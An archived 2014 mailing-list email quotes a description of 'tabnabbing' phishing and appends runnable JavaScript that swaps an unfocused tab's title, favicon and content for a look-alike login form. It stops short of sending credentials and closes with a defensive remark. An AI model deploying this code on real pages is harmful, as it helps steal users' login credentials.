Date: Thu, 11 Sep 2014 18:15:39 -0400
From: mark <whitroth@5-cent.us>
To: undisclosed-recipients:;
Subject: [WSFA] gmail: Tabnabbing: A New Type of Phishing Attack
Reply-To: WSFA members <WSFAlist@KeithLynch.net>
--- excerpt ---
How The Attack Works
A user navigates to your normal looking site.
You detect when the page has lost its focus and hasn’t been interacted
with for a while.
Replace the favicon with the Gmail favicon, the title with “Gmail:
Email from Google”, and the page with a Gmail login look-a-like. This
can all be done with just a little bit of Javascript that takes place
instantly.
As the user scans their many open tabs, the favicon and title act as a
strong visual cue—memory is malleable and moldable and the user will
most likely simply think they left a Gmail tab open. When they click
back to the fake Gmail tab, they’ll see the standard Gmail login page,
assume they’ve been logged out, and provide their credentials to log
in. The attack preys on the perceived immutability of tabs.
After the user has entered their login information and you’ve sent it
back to your server, you redirect them to Gmail. Because they were
never logged out in the first place, it will appear as if the login
was successful.
I dub this new type of phishing attack “tabnabbing”.
--- end excerpt ---
<http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/>
mark
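The excerpt's first three steps (detect lost focus, wait for inactivity, swap favicon, title and page) as a runnable model. This is an added example, not code from Aza Raskin's post or his demo; the idle threshold, the look-alike content and the names (createTabnabber, fakeDocument, browserDocument, simulate) are assumptions. It stops at the visual swap: nothing is sent anywhere, and the redirect-to-the-real-site step is not included. The DOM is reached through a small adapter so the same logic runs against an in-memory document in Node.

```javascript
// Added example, not from the original post: the tab-swap half of
// tabnabbing as an idle timer plus a page mutation. The DOM is reached
// through a small adapter so the decision logic can run offline against
// a fake document; the blur/focus wiring for a real browser is below.
// Threshold and look-alike target are assumed values.

const DEFAULT_IDLE_MS = 5000; // assumption: five seconds of inactivity

// What the page turns into once the user has looked away. Constructed
// placeholder content; the real attack would mimic the target's login
// page markup and favicon exactly.
const LOOKALIKE = {
  title: 'Webmail: Sign in',
  favicon: 'https://attacker.example/lookalike-favicon.ico',
  html: '<form id="login"><input name="user"><input name="pass" type="password"></form>',
};

function createTabnabber(doc, target, opts = {}) {
  const idleMs = opts.idleMs ?? DEFAULT_IDLE_MS;
  const now = opts.now ?? (() => Date.now()); // injectable clock for testing
  const state = { swapped: false, blurredAt: null, original: null };

  return {
    state,
    // Step 1: the tab lost focus; remember when.
    onBlur() { if (!state.swapped) state.blurredAt = now(); },
    // The user came back before the timer fired: reset and stay harmless.
    onFocus() { if (!state.swapped) state.blurredAt = null; },
    // Steps 2-3: called periodically; performs the swap once the tab has
    // sat unfocused for idleMs. Returns true only on the tick that swaps.
    tick() {
      if (state.swapped || state.blurredAt === null) return false;
      if (now() - state.blurredAt < idleMs) return false;
      state.original = { title: doc.title, favicon: doc.getFavicon() };
      doc.title = target.title;        // title shown on the tab
      doc.setFavicon(target.favicon);  // icon shown on the tab
      doc.setBody(target.html);        // look-alike login form
      state.swapped = true;
      return true;
    },
  };
}

// In-memory document for the offline run (constructed stand-in for the DOM).
function fakeDocument(title, favicon) {
  const d = { title, favicon, body: '' };
  d.getFavicon = () => d.favicon;
  d.setFavicon = (href) => { d.favicon = href; };
  d.setBody = (html) => { d.body = html; };
  return d;
}

// Adapter exposing the same interface over a real browser document.
function browserDocument(document) {
  return {
    get title() { return document.title; },
    set title(t) { document.title = t; },
    getFavicon() {
      const link = document.querySelector('link[rel~="icon"]');
      return link ? link.href : null;
    },
    setFavicon(href) {
      let link = document.querySelector('link[rel~="icon"]');
      if (!link) {
        link = document.createElement('link');
        link.rel = 'icon';
        document.head.appendChild(link);
      }
      link.href = href;
    },
    setBody(html) { document.body.innerHTML = html; },
  };
}

// Browser wiring; only runs when a window exists.
if (typeof window !== 'undefined') {
  const nabber = createTabnabber(browserDocument(document), LOOKALIKE);
  window.addEventListener('blur', nabber.onBlur);
  window.addEventListener('focus', nabber.onFocus);
  setInterval(nabber.tick, 1000);
}

// Offline walk-through: the user leaves the tab and stays away six seconds.
function simulate() {
  let clock = 0;
  const doc = fakeDocument('Harmless Page', 'https://harmless.example/favicon.ico');
  const nabber = createTabnabber(doc, LOOKALIKE, { now: () => clock });
  nabber.onBlur();               // user switches tabs at t=0
  clock = 2000;
  const early = nabber.tick();   // inside the idle window: no swap yet
  clock = 6000;
  const swapped = nabber.tick(); // threshold passed: swap happens now
  const again = nabber.tick();   // idempotent: swaps only once
  return { early, swapped, again, doc, original: nabber.state.original };
}

// Offline walk-through: the user comes straight back, so nothing changes.
function simulateReturnEarly() {
  let clock = 0;
  const doc = fakeDocument('Harmless Page', 'https://harmless.example/favicon.ico');
  const nabber = createTabnabber(doc, LOOKALIKE, { now: () => clock });
  nabber.onBlur();
  clock = 1000;
  nabber.onFocus();              // timer reset
  clock = 60000;
  return { swapped: nabber.tick(), title: doc.title };
}
```

The swap changes only what the tab strip shows; the address bar still displays the attacker's origin, which is why browser password managers keyed on origin will not autofill the look-alike form, and why checking the URL before typing a password defeats the attack.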